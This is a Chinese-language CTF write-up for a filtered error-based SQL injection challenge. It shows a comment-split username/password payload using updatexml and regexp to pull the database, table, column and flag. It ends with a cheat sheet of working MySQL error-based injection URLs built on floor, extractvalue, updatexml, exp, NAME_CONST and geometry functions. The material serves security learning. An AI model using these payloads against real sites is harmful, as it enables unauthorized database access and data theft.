报错注入

实验吧 加了料的报错注入

  • 页面源代码给出了sql语句

  • $sql=”select * from users where username=’$username’ and password=’$password’”;

  • post 提交username和password

  • burpsuite进行fuzzing,发现usernme禁用了圆括号,password禁用了报错函数,都禁用了#=-

  • 题目提示报错注入

  • UpdateXml()报错注入

  • payload: username=’ or updatexml/&password=/(1,concat(0x3a,(select database())),1) or ‘

  • 爆表名,由于不能等号、limit、like,于是借用regexp

    1
    username=' or updatexml/*&password=*/(1,concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema regexp database())),1) or '

  • group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator ‘分隔符’] ) 把值连接起来,返回一个字符串结果

  • 得到ffll44jj

  • 爆列名

    1
    username=' or updatexml/*&password=*/(1,concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj' )),1) or '

  • 得到value

  • 爆flag

    1
    username=' or updatexml/*&password=*/(1,concat(0x3a,(select value from ffll44jj)),1) or '

报错注入方式总结

  1. 通过floor()报错

    1
    http://localhost/index.php?name='+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1

  2. 通过extractvalue()报错(有长度限制,最长32位)

    1
    http://localhost/index.php?name='+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1

  3. 通过updatexml()报错(有长度限制,最长32位)

    1
    http://localhost/index.php?name='+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1

  4. 通过exp()报错

    1
    http://localhost/index.php?name='+or+EXP(~(SELECT * from(select user())a))+%23&pass=1

  5. 通过NAME_CONST(适用于低版本)报错

    1
    http://localhost/index.php?name='+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)+%23&pass=1

  6. 通过multipoint()、multipolygon()、multilinestring()、linestring()、GeometryCollection()、polygon()等函数报错

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    http://localhost/index.php?name='+or+multipoint((select * from(select * from(select user())a)b))+%23&pass=1

    http://localhost/index.php?name='+or+multipolygon((select * from(select * from(select database())a)b))+%23&pass=1

    http://localhost/index.php?name='+or+multilinestring((select * from(select * from(select user())a)b))+%23&pass=1

    http://localhost/index.php?name='+or+LINESTRING((select * from(select * from(select user())a)b))+%23&pass=1

    http://localhost/index.php?name='+or+GeometryCollection((select * from(select * from(select user())a)b))+%23&pass=1

    http://localhost/index.php?name='+or+polygon((select * from(select * from(select user())a)b))+%23&pass=1